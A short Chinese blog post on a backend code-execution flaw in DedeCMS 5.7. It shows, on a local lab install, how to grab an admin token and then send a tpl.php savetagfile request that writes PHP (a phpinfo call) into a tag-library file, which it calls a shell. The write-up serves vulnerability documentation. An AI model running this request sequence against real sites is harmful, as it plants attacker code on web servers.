织梦cms5.7 后台存在代码执行漏洞

编程开发更新时间:2023-05-01 03:23:06

漏洞利用：
在本地搭建织梦cms，默认的后台地址为域名/dede
因为后续的利用需要使用到token，然而登录成功后的数据包内并没有显示token值。所以需要访问如下链接获取token：
http://192.168.137.131/dede/tpl.php?action=upload
访问后查看页面源代码，获取到token

然后访问：
http://192.168.137.131/dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=fc3851c93ca2fcf62bc099debd75edb2
写入代码成功，shell地址：
http://192.168.137.131/include/taglib/moonsec.lib.php

更多推荐

织梦cms5.7 后台存在代码执行漏洞

本文发布于:2023-05-01 02:43:00，感谢您对本站的认可！

本文链接:https://www.52dianzi.com/category/article/6d7e939c3ec9ee8470e7a1a212ddb0e9.html